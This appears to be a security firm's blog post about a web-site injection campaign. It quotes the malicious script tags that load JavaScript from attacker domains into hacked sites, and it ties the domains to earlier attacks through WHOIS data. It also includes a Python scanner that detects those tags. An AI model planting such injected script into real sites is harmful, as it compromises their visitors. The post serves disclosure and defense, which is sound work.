Update 1: It seems that this attack is limited to Bluehost and Dreamhost, not GoDaddy as in the previous attacks.
Update 2: This script should fix/clean an infected site: site fix.php
Update 3: Attackers are using nowisisdudescars.com and onlineisdudescars.com as well.
<script src=" http://whereisdudescars.com/js2.php"></script>
<script src=" http://nowisisdudescars.com/js.php
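A defender-side check for the injection shown above, as an added example that is not the cleanup script linked in Update 2 or code from the original post: it scans a web root for `<script>` tags that load from the three domains named on this page. The function names and the list of file extensions are assumptions.

```python
import os
import re
import sys

# Domains this page names as serving the injected script.
BAD_DOMAINS = ("whereisdudescars.com", "nowisisdudescars.com", "onlineisdudescars.com")

# Opening <script ... src=...> tag. Tolerates whitespace inside the quotes and a
# missing closing quote or tag, both of which appear in the samples on this page.
SCRIPT_SRC = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*["']?\s*(?:https?:)?//([^/\s"'>]+)""",
    re.IGNORECASE,
)

def host_of(authority):
    """Reduce 'user@Host.com:80' to 'host.com'."""
    return authority.rsplit("@", 1)[-1].split(":")[0].rstrip(".").lower()

def is_listed(host):
    """Exact domain or a subdomain of it; 'bad.com.example.org' does not match."""
    return any(host == d or host.endswith("." + d) for d in BAD_DOMAINS)

def scan_text(text):
    """Return [(line_number, host)] for script tags loading from a listed domain."""
    hits = []
    for m in SCRIPT_SRC.finditer(text):
        host = host_of(m.group(1))
        if is_listed(host):
            hits.append((text.count("\n", 0, m.start()) + 1, host))
    return hits

def scan_tree(root, exts=(".php", ".html", ".htm", ".js", ".tpl")):
    """Walk a web root; return sorted [(path, line_number, host)]."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                # errors="replace" keeps the scan going on non-UTF-8 files
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings += [(path, n, h) for n, h in scan_text(fh.read())]
    return sorted(findings)

if __name__ == "__main__":
    # Usage: python scan.py /path/to/webroot  (the path is the reader's own docroot)
    for path, line, host in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}:{line}: script loaded from {host}")
```

A hit shows where the tag was written into a file, not how it got there; the exploit vector is a separate question.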
What is interesting is the people behind this attack. Do you remember the losotrana attack amongst the various others we’ve discussed in the past few months? Well, the people involved in this one are the same. Check out the WHOIS contact info for whereisdudescars.com:
Domain name: whereisdudescars.com
Hilary Kneber firstname.lastname@example.org
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
It’s the same email@example.com that registered losotrana.com, holasionweb.com and others. We’re still researching the exploit vector, and we’ll post more details when we have them.
If you’re having difficulties getting your site cleaned up, send us an email at firstname.lastname@example.org or visit our site: sucuri.net. We can get your sites cleaned up right away.